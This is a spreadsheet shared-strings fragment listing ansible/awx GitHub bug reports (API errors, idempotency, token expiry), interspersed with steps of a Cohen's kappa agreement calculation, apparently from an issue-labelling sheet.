    <t>Pe=PA1,defect×PA2,defect+PA1,non×PA2,non=(0.674×0.722)+(0.326×0.278)Pe = P_{A1,defect} \times P_{A2,defect} + P_{A1,non} \times P_{A2,non} = (0.674 \times 0.722) + (0.326 \times 0.278)Pe=PA1,defect​×PA2,defect​+PA1,non​×PA2,non​=(0.674×0.722)+(0.326×0.278) Pe=0.4867+0.0906=0.5773Pe = 0.4867 + 0.0906 = 0.5773Pe=0.4867+0.0906=0.5773</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6049</t>
  </si>
  <si>
    <t>Inventory Group Nested Hosts View errors with a 404</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY I searched for implemented issues and couldn't find anything. /inventories/inventory/*num*/groups/*num*/nested_hosts isn't loading in ui_next ##### ENVIRONMENT * AWX version: 9.next ##### STEPS TO REPRODUCE 1. Create an Inventory Group with nested hosts 2. View the #/inventories/inventory/*num*/groups/*num*/nested_hosts page ##### EXPECTED RESULTS Nested Hosts to be displayed ##### ACTUAL RESULTS 404 messaging page ##### ADDITIONAL INFORMATION &lt;img width="1159" alt="Screen Shot 2020-02-25 at 9 10 38 AM" src="https://user-images.githubusercontent.com/12446869/75254948-29c6a900-57af-11ea-92c0-7d35dee281c6.png"&gt;</t>
  </si>
  <si>
    <t>Step 3: Calculate Cohen's Kappa (κ)</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6128</t>
  </si>
  <si>
    <t>AWX Collection user and role modules break when creating or updating an existing object</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY #### Collection Updating an object without a `name` field breaks, which also breaks idempotency. Probably because of: https://github.com/ansible/awx/blob/devel/awx_collection/plugins/module_utils/tower_api.py#L534 ##### ENVIRONMENT * AWX version: 9.2.0 * AWX install method: docker on linux * Ansible version: 2.9.4 * Operating System: ubuntu 18.04 ##### STEPS TO REPRODUCE Run a playbook that creates a user or role twice, the second time it will fail ##### EXPECTED RESULTS it should be Idempotent and know how to update those objects ##### ACTUAL RESULTS ``` PLAY [testhost] **************************************************************** TASK [Gathering Facts] ********************************************************* ok: [testhost] TASK [tower_user : Create a User] ********************************************** fatal: [testhost]: FAILED! =&gt; {"changed": false, "msg": "Unable to process update of item due to missing data 'name'"} PLAY RECAP ********************************************************************* testhost : ok=1 changed=0 unreachable=0 failed=1 skipped=0 rescued=0 ignored=0 ```</t>
  </si>
  <si>
    <t>κ=Po−Pe1−Pe=0.940−0.57731−0.5773=0.36270.4227≈0.858\kappa = \frac{Po - Pe}{1 - Pe} = \frac{0.940 - 0.5773}{1 - 0.5773} = \frac{0.3627}{0.4227} \approx 0.858κ=1−PePo−Pe​=1−0.57730.940−0.5773​=0.42270.3627​≈0.858</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6225</t>
  </si>
  <si>
    <t>ask_variables_on_launch issue on AWX</t>
  </si>
  <si>
    <t>##### ISSUE TYPE ask_variables_on_launch is set to true still getting error as undefined variable. ##### SUMMARY I have created a Job template via API and set the ask_variables_on_launch value to true. Though setting the value as true, playbook fails during execution, saying 'undefined variable' ##### ENVIRONMENT * AWX version: 9.2.0 * Tower CLI 3.3.8 * API v2 * AWX install method: Installation without Docker on CentOS7 * Ansible version: 2.9.5 * Operating System: CentOS Linux release 7.7.1908 (Core) * Web Browser: Google Chrome Version 80.0.3987.132 (Official Build) (64-bit) ##### STEPS TO REPRODUCE &gt;&gt; Created a Job Template for sample. &gt;&gt; Verify the values of the sample job template for 'project, inventory, playbook' attributes, and its corresponding values. &gt;&gt; With the values observed from the sample job template, create a new job template via APIv2 and set the value of "ask_variables_on_launch to true" * API URL: * http://awx-server-ip/api/v2/job_templates/ ##### EXPECTED RESULTS Being set the value of 'ask_variables_on_launch' to true, I should be able to execute the playbook by passing extra variable during launch of the playbook and via Survey as well. ##### ACTUAL RESULTS "msg": "The task includes an option with an undefined variable. The error was: 'ansible.utils.unsafe_proxy.AnsibleUnsafeText object' has no attribute 'it_user'\n\nThe error appears to be in '/tmp/awx_25_ahs6_izp/project/useradd_IT.yml': line 7, column 7, but may\nbe elsewhere in the file depending on the exact syntax problem.\n\nThe offending line appears to be:\n\n tasks:\n - name: Adding users\n ^ here\n", "_ansible_no_log": false --The same error occurred when the value of 'ask_variables_on_launch' set as false. ##### ADDITIONAL INFORMATION ![image](https://user-images.githubusercontent.com/47471901/76210019-3d4f2680-6229-11ea-95f8-04dc9ac4f84d.png) ![image](https://user-images.githubusercontent.com/47471901/76210151-87380c80-6229-11ea-8e8e-2359422c1276.png)</t>
  </si>
  <si>
    <t>Final result:</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6267</t>
  </si>
  <si>
    <t>Email Notification - started date is displayed as null when the approval node needs review</t>
  </si>
  <si>
    <t>When an approval node needs review and an email notification is setup, the email body contains null started, when the started field is actually set in the api Steps to reproduce: 1. Create a WFJT with approval node 2. associate it with Email notification template that will send notification on WF Approvals 3. launch the WFJT 4. wait for the email notification when the approval node needs review: Expected Results: the notification should be as follows: ``` The approval node "approval node MediumResident" needs review. This approval node can be viewed at: https://ec2-18-212-167-124.compute-1.amazonaws.com/#/workflows/86 { "id": 87, "name": "approval node MediumResident\ufffd", "url": "https://ec2-18-212-167-124.compute-1.amazonaws.com/#/workflows/86", "created_by": "apurva", "started": "2020-03-11T21:21:19.898052+00:00", "finished": null, "status": "pending", "traceback": "" } ``` Actual Results: the notification has null started field ``` The approval node "approval node MediumResident" needs review. This approval node can be viewed at: https://ec2-18-212-167-124.compute-1.amazonaws.com/#/workflows/86 { "id": 87, "name": "approval node MediumResident\ufffd", "url": "https://ec2-18-212-167-124.compute-1.amazonaws.com/#/workflows/86", "created_by": "apurva", "started": null, "finished": null, "status": "pending", "traceback": "" } ```</t>
  </si>
  <si>
    <t>Cohen’s Kappa≈0.86\boxed{ \text{Cohen's Kappa} \approx 0.86 }Cohen’s Kappa≈0.86​</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6309</t>
  </si>
  <si>
    <t>POST to api/v2/inventories/&lt;ID&gt;/inventory_sources/ with id and name gets 201 created (should be 400)</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY &lt;!-- Briefly describe the problem. --&gt; I was trying to associate an inventory script with an inventory as an inventory source. When I did a POST to api/v2/inventories/&lt;ID&gt;/inventory_sources/ with id and name I got a 201 created (should be 400) and an inventory source object back. I then launched an inventory update and the following traceback was produced: ``` Traceback (most recent call last): File "/var/lib/awx/venv/awx/lib64/python3.6/site-packages/awx/main/tasks.py", line 1308, in run args = self.build_args(self.instance, private_data_dir, passwords) File "/var/lib/awx/venv/awx/lib64/python3.6/site-packages/awx/main/tasks.py", line 2472, in build_args if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()): File "/var/lib/awx/venv/awx/lib64/python3.6/site-packages/awx/conf/settings.py", line 511, in __getattr_without_cache__ return getattr(self._wrapped, name) File "/var/lib/awx/venv/awx/lib64/python3.6/site-packages/awx/conf/settings.py", line 418, in __getattr__ value = self._get_default(name) File "/var/lib/awx/venv/awx/lib64/python3.6/site-packages/awx/conf/settings.py", line 405, in _get_default return getattr(self.default_settings, name) AttributeError: 'Settings' object has no attribute '_EXCLUDE_EMPTY_GROUPS' ``` Seems like the bug is that we are not requiring the `source` perhaps among other things and ignoring `id`</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6324</t>
  </si>
  <si>
    <t>tower_role not idempotent</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Granting a user a role with the AWX collection twice gives changed twice ##### ENVIRONMENT * AWX version: 9.3.0 ##### STEPS TO REPRODUCE ```yaml - name: Add Joe to workflow execute role tower_role: user: joe role: execute workflow: test-role-workflow state: present register: result - assert: that: - "result is changed" - name: Add Joe from the workflow execute role, no-op tower_role: user: joe role: execute workflow: test-role-workflow state: present register: result - assert: that: - "result is not changed" ``` ##### EXPECTED RESULTS passes ##### ACTUAL RESULTS fails, both tasks report changed ##### ADDITIONAL INFORMATION this is being refactored anyway, test again then https://github.com/ansible/awx/pull/6304</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6332</t>
  </si>
  <si>
    <t>Getting a 400 error when Credential Add/Edit has an invalid SSH Private Key field</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY When a invalid SSH Private Key is specified, getting a 400 error instead of an error under the field that the value is invalid ##### STEPS TO REPRODUCE 1. Add/Edit a credential 2. select any of the credential type 2. Enter an invalid value for the SSH Private Key ##### EXPECTED RESULTS It should say that the value is invalid under the field ##### ACTUAL RESULTS Getting a 400 error ![Screen Shot 2020-03-18 at 1 19 38 PM](https://user-images.githubusercontent.com/11617351/76988490-255b5f00-691b-11ea-848a-8c48233e987b.png)</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6342</t>
  </si>
  <si>
    <t>Virtualenv in Kubernetes deployment doesn't work</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Error when applying `curl -X PATCH 'https://admin:mypass@myurl/api/v2/organizations/my_org/' \ -d '{"custom_virtualenv": "/opt/custom-venvs/my_env/"}' -H 'Content-Type:application/json'` `{"custom_virtualenv":["/opt/custom-venvs/my_env/ is not a valid virtualenv in /var/lib/awx/venv"]}` ##### ENVIRONMENT * AWX version: 9.3.0 * AWX install method: Kubernetes v1.15.3 * Ansible version: 2.9.5 ##### STEPS TO REPRODUCE 1) Install AWX to kubernetes with similar config &lt;details&gt; &lt;summary&gt;inventory config&lt;/summary&gt; ``` localhost ansible_connection=local ansible_python_interpreter="/usr/bin/env python" [all:vars] dockerhub_base=ansible kubernetes_context=mycontext kubernetes_namespace=awx kubernetes_ingress_hostname=myingress awx_task_hostname=awx awx_web_hostname=awxweb postgres_data_dir="~/.awx/pgdocker" host_port=80 host_port_ssl=443 docker_compose_dir="~/.awx/awxcompose" pg_hostname=mypghost pg_username=awx pg_password=mypgpass pg_database=awx pg_port=5432 rabbitmq_password=awxpass rabbitmq_erlang_cookie=cookiemonster admin_user=admin admin_password=myadminpass secret_key=mysecretkey logos/blob/master/TRADEMARKS.md ``` &lt;/details&gt; &lt;details&gt; &lt;summary&gt;venv_vars.yaml&lt;/summary&gt; ``` --- custom_venvs: - name: my_env python: python3 python_ansible_version: 2.9.6 python_modules: - dnspython - zabbix-api - jmespath ``` &lt;/details&gt; 2) Assigning custom venv according to [this documentation](https://github.com/ansible/awx/blob/devel/docs/custom_virtualenvs.md) `curl -X PATCH 'https://admin:mypass@myurl/api/v2/settings/system/' \ -d '{"CUSTOM_VENV_PATHS": [["/opt/custom-venvs/my_env/"]}' -H 'Content-Type:application/json'` &lt;details&gt; &lt;summary&gt;answer&lt;/summary&gt; ``` { "ACTIVITY_STREAM_ENABLED":true, "ACTIVITY_STREAM_ENABLED_FOR_INVENTORY_SYNC":false, "ORG_ADMINS_CAN_SEE_ALL_USERS":true, "MANAGE_ORGANIZATION_AUTH":true, "TOWER_URL_BASE":"myurl", "REMOTE_HOST_HEADERS":[ "HTTP_X_FORWARDED_FOR" ], "PROXY_IP_WHITELIST":[ ], "LICENSE":{ }, "REDHAT_USERNAME":"admin", "REDHAT_PASSWORD":"$encrypted$", "AUTOMATION_ANALYTICS_URL":"https://example.org", "INSTALL_UUID":"c1885c2a-d736-4023-9517-49929f8d77fa", "CUSTOM_VENV_PATHS":[ "/opt/custom-venvs/my_env/" ], "INSIGHTS_TRACKING_STATE":false, "BROKER_DURABILITY":true, "AUTOMATION_ANALYTICS_LAST_GATHER":null, "AUTOMATION_ANALYTICS_GATHER_INTERVAL":14400 } ``` &lt;/details&gt; 3) Assigning custom venv to organization and get and error `curl -X PATCH 'https://admin:mypass@myurl/api/v2/organizations/my_org/' \ -d '{"custom_virtualenv": "/opt/custom-venvs/my_env/"}' -H 'Content-Type:application/json'` &lt;details&gt; &lt;summary&gt;error&lt;/summary&gt; ``` {"custom_virtualenv":["/opt/custom-venvs/my_env/ is not a valid virtualenv in /var/lib/awx/venv"]} ``` &lt;/details&gt; ##### EXPECTED RESULTS `my_org` will use custom venv ##### ACTUAL RESULTS `my_org` raises an error when apllying custom venv ##### ADDITIONAL INFORMATION I've checked both containers `awx_web` and `awx_task`, they have `/opt/custom-venvs/my_env/` dir with working venv. Even if `PATCH api/v2/settings/system/` works properly (according to it answer, and i can see added venv in web interface), `GET api/v2/config/` still returns no venv's &lt;details&gt; &lt;summary&gt;api/v2/config/ answer&lt;/summary&gt; ``` { "time_zone": "UTC", "license_info": { "license_key": "OPEN", "valid_key": true, "compliant": true, "features": { "activity_streams": true, "ha": true, "ldap": true, "multiple_organizations": true, "surveys": true, "system_tracking": true, "rebranding": true, "enterprise_auth": true, "workflows": true }, "license_type": "open" }, "version": "9.3.0", "ansible_version": "2.9.5", "eula": "", "analytics_status": "off", "become_methods": [ [ "sudo", "Sudo" ], [ "su", "Su" ], [ "pbrun", "Pbrun" ], [ "pfexec", "Pfexec" ], [ "dzdo", "DZDO" ], [ "pmrun", "Pmrun" ], [ "runas", "Runas" ], [ "enable", "Enable" ], [ "doas", "Doas" ], [ "ksu", "Ksu" ], [ "machinectl", "Machinectl" ], [ "sesu", "Sesu" ] ], "project_base_dir": "/var/lib/awx/projects", "project_local_paths": [], "custom_virtualenvs": [ "/var/lib/awx/venv/ansible/" ] } ``` &lt;/details&gt; After finding that venv doesn't apply even in `system`, i've tried to make fresh install of awx on another kube cluster, with same results.</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6362</t>
  </si>
  <si>
    <t>Can't Edit JT with no Inventory</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Can't Edit JT with no Inventory but Inventory Prompt on Launch ##### ENVIRONMENT * AWX version: 2.9 * AWX install method: docker for mac * Ansible version: 9.2 * Operating System: Mojave * Web Browser: Chrome ##### STEPS TO REPRODUCE Create a JT with no inventory, but click the Prompt On Launch checkbox. Go back and edit that inventory, but keep the inventory field empty and prompt on launch for it checked. ##### EXPECTED RESULTS The JT can be saved ##### ACTUAL RESULTS See that the JT can't be saved and returns a 400 error</t>
  </si>
  <si>
    <t>it returns 400 error ,</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6365</t>
  </si>
  <si>
    <t>Fresh install Jobs not starting</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report Just did a fresh install of AWX 9.3.0 and none of the JOBs are being triggered. Project, Jobs, Ad-hoc jobs any jobs. after a few minutes it Times out with this error: &gt; Call to /api/v2/ad_hoc_commands/1/relaunch/ failed. returned status: 504. ##### SUMMARY ##### ENVIRONMENT * AWX version: 9.3.0 * AWX install method: docker on centos 7 * Ansible version: 2.9.6 * Operating System: Centos 7 * Web Browser: Chrome ##### STEPS TO REPRODUCE try to execute ANY job such as project, ad-hoc script, etc.. ##### EXPECTED RESULTS Jobs are stuck in starting mode they never start, please see screenshots below. ##### ADDITIONAL INFORMATION Please review images below: ![image](https://user-images.githubusercontent.com/20629911/77183907-3e375200-6a8c-11ea-9d0e-f1a7b2310b21.png) Image from Web continaer ![image](https://user-images.githubusercontent.com/20629911/77184346-ed742900-6a8c-11ea-93da-ea0380c10360.png) Image from TASK container ![image](https://user-images.githubusercontent.com/20629911/77186997-0a126000-6a91-11ea-803f-8017d8536abc.png) Thank you, HS</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6366</t>
  </si>
  <si>
    <t>[awx-pf] Can't edit job templates</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Tried to edit the name and description of a job template. It doesn't change when I click save. Reproduction: 1. Make a job template 2. Try to edit various things about it. pretty straightforward. I don't see any 400s or anything, though feel free to poke around and see what you find.</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6433</t>
  </si>
  <si>
    <t>Can't save the modal when adding a team role to an organization</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY The save button in this screenshot doesn't always work: ![Screenshot from 2020-03-26 09-39-57](https://user-images.githubusercontent.com/19942822/77653157-c9f62600-6f45-11ea-87d1-8c2ad40e1d12.png) ##### STEPS TO REPRODUCE 1. Make a team and org, put the team inside the org. 2. Go to org -&gt; Access tab -&gt; add a team permission 3. Try to give the team admin permissions. ##### EXPECTED RESULTS Clicking the save button works, or presents an error. ##### ACTUAL RESULTS No visual feedback, the button appears to not respond. The network tab presents a 400: ```{"msg":"You cannot assign an Organization participation role as a child role for a Team."}```</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6460</t>
  </si>
  <si>
    <t>Unable to save any forms</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY &lt;!-- Briefly describe the problem. --&gt; I'm unable to save any forms in AWX 9.3.0. When I try to click on the save button to create a new sample project or add LDAP authencatication I have a status code 504. And the form is never saved. ##### ENVIRONMENT * AWX version: 9.3.0 * AWX install method: docker on linux * Ansible version: 2.9.5 * Operating System: CentOS 7.7 * Web Browser: Chrome and Chrome in private ##### STEPS TO REPRODUCE &lt;!-- Please describe exactly how to reproduce the problem. --&gt; Create a new project sample and click save ##### EXPECTED RESULTS &lt;!-- What did you expect to happen when running the steps above? --&gt; The form should be saved ##### ACTUAL RESULTS &lt;!-- What actually happened? --&gt; Failed to create new project. POST returned status: 504 ##### ADDITIONAL INFORMATION &lt;!-- Include any links to sosreport, database dumps, screenshots or other information. --&gt; In the logs I can see : `awx_web | 2020/03/27 14:23:31 [error] 122#0: *47 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 10.204.35.76, server: _, request: "GET /websocket/ HTTP/1.1", upstream: "http://127.0.0.1:8051/websocket/", host: "myserver:82" ` And in the browser console I have : ``` Failed to load resource: the server responded with a status of 504 (Gateway Time-out) WebSocket connection to 'ws://myserver:82/websocket/' failed: WebSocket opening handshake timed out ```</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6464</t>
  </si>
  <si>
    <t>Survey multiple choice options need improvements and error handling</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY From https://github.com/ansible/awx/issues/5900#issuecomment-605008285: cc @keithjgrant &gt; Both add and edit forms for JT surveys need some way of clarifying how to format single-select and multi-select options. It is trivial to create modal-overlay 400 errors with the basic input textbox given, and these 400 errors do not provide any useful information to the end user. ##### STEPS TO REPRODUCE Put bad input into a job template survey with either single or multi-select. semicolons in random spots, etc, in an attempt to break it. some things work, some don't. ##### EXPECTED RESULTS Form validation on submission that keeps you on the form page, indicating formatting errors or something similar when met with a 400 error. I would also like information around the box about how to format the survey. ##### ACTUAL RESULTS 400 that takes you back to the survey list, no further information about the error.</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6485</t>
  </si>
  <si>
    <t>modal searches shouldn't be case-sensitive</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Tried to search for an Organization when creating a user. "default" doesn't return the "Default" organization. This should be case-insensitive. in addition, this ticket should involve going through similar searches and ensuring that they are case-insensitive.</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6492</t>
  </si>
  <si>
    <t>ISSUE: Call to /api/v2/job_templates/12/launch failed. POST returned status: 504.</t>
  </si>
  <si>
    <t>&lt;!--- The Ansible community is highly committed to the security of our open source projects. Security concerns should be reported directly by email to security@ansible.com. For more information on the Ansible community's practices regarding responsible disclosure, see https://www.ansible.com/security --&gt; ##### ISSUE TYPE &lt;!--- Pick one below and delete the rest: --&gt; - Job Template Run - POST returned status: 504 ##### COMPONENT NAME &lt;!-- Pick the area of AWX for this issue, you can have multiple, delete the rest: --&gt; - API ##### SUMMARY &lt;!-- Briefly describe the problem. --&gt; ##### ENVIRONMENT * AWX version: How to know the version? This is a newly installed AWX as well * AWX install method: docker on Linux * Ansible version: 2.9.6 * Operating System: CentOS 7 * Web Browser: Firefox ##### STEPS TO REPRODUCE The issue will be reproduced when Launching the Job Template &lt;!-- For new features, show how the feature would be used. For bugs, please show exactly how to reproduce the problem. Ideally, provide all steps and data needed to recreate the bug from a new awx install. --&gt; ##### EXPECTED RESULTS &lt;!-- For bug reports, what did you expect to happen when running the steps above? --&gt; ##### ACTUAL RESULTS - Call to /api/v2/job_templates/12/launch failed. POST returned status: 504. &lt;!-- For bug reports, what actually happened? --&gt; ##### ADDITIONAL INFORMATION &lt;!-- Include any links to sosreport, database dumps, screenshots or other information. --&gt; GUYS, PLEASE HELP ME WITH THIS ISSUE. :( Let me know if you need more info.</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6498</t>
  </si>
  <si>
    <t>504 timeouts when fetching job_events for a running job</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Having issues with 504 timeouts on `job_events` APIs for a given host when a job is running, e.g. `api/v2/hosts/1/job_events/`. Maybe due to deadlocks? **EDIT**: We redeployed `awx_web` to see if we could make the APIs work again, still 504 timeout on every `api/v2/hosts/1/job_events/` request. Something is very wrong here. ##### ENVIRONMENT * AWX version: 9.3.0 * AWX install method: openshift manual deployment * Ansible version: 2.9.5 * Operating System: Official AWX images * Web Browser: Firefox, postman, Python's `request.get()` (from both a Linux and Mac client) ##### STEPS TO REPRODUCE 1. Start a task that takes long time to finish (Our task is a task that writes hundreds of commands on a device and takes about 8 minutes to finish) 2. Fetch job events API while task is running 3. 504 timeouts on that API even after the job is done for a loong time. (It did start responding again earlier, but now I've waited 10 minutes and still no response from the API). It's important to note that when this occurs we get sporadic 504's on other endpoints too, but I believe this may happen due to sync workers and not enough of them. ##### EXPECTED RESULTS Being able to fetch `job_events` when a task is running. ##### ACTUAL RESULTS Timeout on `job_events`. ##### ADDITIONAL INFORMATION We found #6108 and disabled external logging to Logstash, but don't seem like the issue was solved. The timeout is happening due to OpenShift cutting the connection (499), but the request should never take more than 30 seconds anyway: ![image](https://user-images.githubusercontent.com/5310116/78008928-926dec00-7340-11ea-82e8-877aedbe2b17.png)</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6520</t>
  </si>
  <si>
    <t>Logout button on the API for ui-next does not work</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Click on the logout button on the API for ui-next makes a get request instead of a post request, due to which an error is thrown ##### STEPS TO REPRODUCE 1. https://localhost:3000/api 2. click on the logout button &lt;img width="352" alt="Screen Shot 2020-04-01 at 10 28 17 AM" src="https://user-images.githubusercontent.com/11617351/78149937-98c59c00-7404-11ea-9a9d-f954d1e9e24f.png"&gt; ##### EXPECTED RESULTS The logout should be successfull ##### ACTUAL RESULTS An error is thrown: &lt;img width="533" alt="Screen Shot 2020-04-01 at 10 28 34 AM" src="https://user-images.githubusercontent.com/11617351/78149948-9c592300-7404-11ea-8be8-cb87c67542cf.png"&gt;</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6630</t>
  </si>
  <si>
    <t>refresh token does not expire</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Using password grant type, refresh token does not expire according to `REFRESH_TOKEN_EXPIRE_SECONDS`. ##### ENVIRONMENT * AWX version: 10.0.0 * AWX install method: docker on linux * Operating System: CentOS v8 * Web Browser: Chrome ##### STEPS TO REPRODUCE Set the expiry times low from AWX GUI &gt; Settings &gt; System Confirm the settings from api ``` https://x.x.x.x/api/v2/settings/all/ ``` ``` "OAUTH2_PROVIDER": { "ACCESS_TOKEN_EXPIRE_SECONDS": 10, "REFRESH_TOKEN_EXPIRE_SECONDS": 10, "AUTHORIZATION_CODE_EXPIRE_SECONDS": 600 }, ``` Create an Application from the GUI of Authorization Grant Type `Resource owner password-based`. Save a copy of the `clientId` and `clientSecret`. Create the access and refresh tokens using password grant: ```bash curl -v -k -X POST -d \ "grant_type=password&amp;username=someuser&amp;password=somepassword&amp;scope=read" \ -u "clientId:clientSecret" https://x.x.x.x/api/o/token/ -i ``` Which returns ```json {"access_token": "Ma5cLFKYs1Q8iknITJjAe0VXJyiUVP", "expires_in": 10, "token_type": "Bearer", "scope": "read", "refresh_token": "IymTfQp0JtT3HtDUitoAj7eaxXr3zM"} ``` Wait at least 20 seconds and try use refresh token ``` curl -k -X POST -d \ "grant_type=refresh_token&amp;refresh_token=IymTfQp0JtT3HtDUitoAj7eaxXr3zM" \ -u "clientId:clientSecret" https://x.x.x.x/api/o/token/ -i ``` That previous refresh token continues to generate new `access_token` and new `refresh_token` after 20 seconds. Even after I waited 12 hours it still worked. I also tried manually adding the settings to `/etc/tower/settings.py` of the docker container. ``` OAUTH2_PROVIDER = {'ACCESS_TOKEN_EXPIRE_SECONDS': 10, 'REFRESH_TOKEN_EXPIRE_SECONDS': 10, 'AUTHORIZATION_CODE_EXPIRE_SECONDS': 600} ``` and restarting the container. ##### EXPECTED RESULTS The refresh token should have failed to generate a new access token and returned an error message after more than 10 + 10 seconds. ##### ACTUAL RESULTS The last refresh token still generates a new `access_token` and new `refresh_token` after 20 seconds. I waited 12 hours and the last generated refresh token still works. So it appears to ignore the refresh token expiry time. #### ADDITIONAL INFO Should the refresh token stay the same each time it is used? Current behavior is that a new refresh token is generated each time it is used. The previous one no longer works. So the way it works currently, refresh tokens are one-time use only.</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/6653</t>
  </si>
  <si>
    <t>Machine credentials are refused by tower_job_template</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Can't create job template with tower_job_template because of credentials. Machine credentials (SSH) are refused. ##### ENVIRONMENT * AWX version: 10.0.0 * AWX install method: docker on linux * Ansible version: 2.9.5 * Operating System: Debian Buster * Web Browser: Firefox * AWX collection: 10.0.0 ##### STEPS TO REPRODUCE ``` - name: Creation templates tower_job_template: name: "{{ item.name }}" playbook: "{{ item.playbook }}" inventory: "{{ awx_inventory }}" project: "{{ awx_inventory }}" credentials: - "ssh-root-key" survey_enabled: yes survey_spec: name: "survey {{ item.name }}" description: "" spec: "{{ item.survey_spec }}" tower_host: "{{ tower_host }}" tower_username: "{{ tower_username }}" tower_password: "{{ tower_password }}" validate_certs: False with_items: "{{ awx_job_templates }}" loop_control: label: "{{ item.name }}" tags: templates ``` ##### EXPECTED RESULTS Template created ##### ACTUAL RESULTS ``` { "ansible_loop_var":"item", "changed":false, "item":{ "job_type":"run", "name":"Provisionning TWIN", "playbook":"play-provisioning_twin.yml", }, "msg":"Failed to add credential to job template: The Tower server claims it was sent a bad request.\n\nPOST https://localhost/api/v2/job_templates/9/extra_credentials/\nParams: None\nData: {\"id\": 3, \"associate\": true}\n\nResponse: {\"error\":\"Extra credentials must be network or cloud.\"}" } ``` ##### ADDITIONAL INFORMATION `credential: "ssh-root-key"` kinda works, but according to the documentation it is deprecated. And when I go into the web interface, the credentials field is empty.</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/7063</t>
  </si>
  <si>
    <t>POSTing to create workflow approval node (node without UJT) ignores all_parents_must_converge</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY ![all_parents](https://user-images.githubusercontent.com/9889020/82239367-abd5f200-9906-11ea-8c60-39ef86625ff8.gif) Relates to https://github.com/ansible/awx/issues/6998 ##### STEPS TO REPRODUCE 1. Create an empty workflow 2. Attempt to POST to `/api/v2/workflow_job_templates/:id/workflow_nodes/` with the following payload: ``` { "all_parents_must_converge": true } ``` ##### EXPECTED RESULTS A node is created with `all_parents_must_converge` set to `true` ##### ACTUAL RESULTS A node is created with `all_parents_must_converge` set to `false` ##### ADDITIONAL INFORMATION The use case here is approval nodes. In order to create an approval node in the UI we make this initial POST request to create the node. After we have a node, we create the corresponding approval template. If the user were to attempt to create a new approval node in the UI where `all_parents_must_converge` was set to true it would currently save but `all_parents_must_converge` would be set to false. If this becomes problematic to fix, the UI could always issue a 3rd request to go back and PATCH the node from the first request but this would be less desirable.</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/7191</t>
  </si>
  <si>
    <t>Invalid HTTP request when Conjur credential secret has a space in the name</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Invalid HTTP request when Conjur credential secret has a space in the name ##### STEPS TO REPRODUCE Create a conjur credential containing a space. When retrieving the credential a 404 is returned from conjur. The reason for this is because the conjur credential plugin url encodes the secretID with a `+` however conjur is expecting a `%20`. ##### EXPECTED RESULTS To get back the credential content. ##### ACTUAL RESULTS AWX fails to retrieve the credential and a 404 is returned. ##### ADDITIONAL INFORMATION</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/7243</t>
  </si>
  <si>
    <t>500 error on unauthenticated HTTP GET to nested workflow endpoint</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Not a huge deal, just something I noticed while debugging some unrelated test failures: If you make a GET request to ` api/v2/workflow_job_template_nodes/n/create_approval_template/` when unauthenticated, you'll get a 500 instead of a 401. It seems to work fine if you're logged in. ##### STEPS TO REPRODUCE - make a workflow with nodes - log out - open browser dev tools and network tab - visit ` api/v2/workflow_job_template_nodes/n/create_approval_template/` in api browser ##### EXPECTED RESULTS 401 ##### ACTUAL RESULTS 500 ##### ADDITIONAL INFORMATION ![Screenshot from 2020-06-03 19-11-23](https://user-images.githubusercontent.com/9753817/83697865-08efca00-a5ce-11ea-9d0c-0173751041df.png)</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/7264</t>
  </si>
  <si>
    <t>Mattermost Notification fails on latest release</t>
  </si>
  <si>
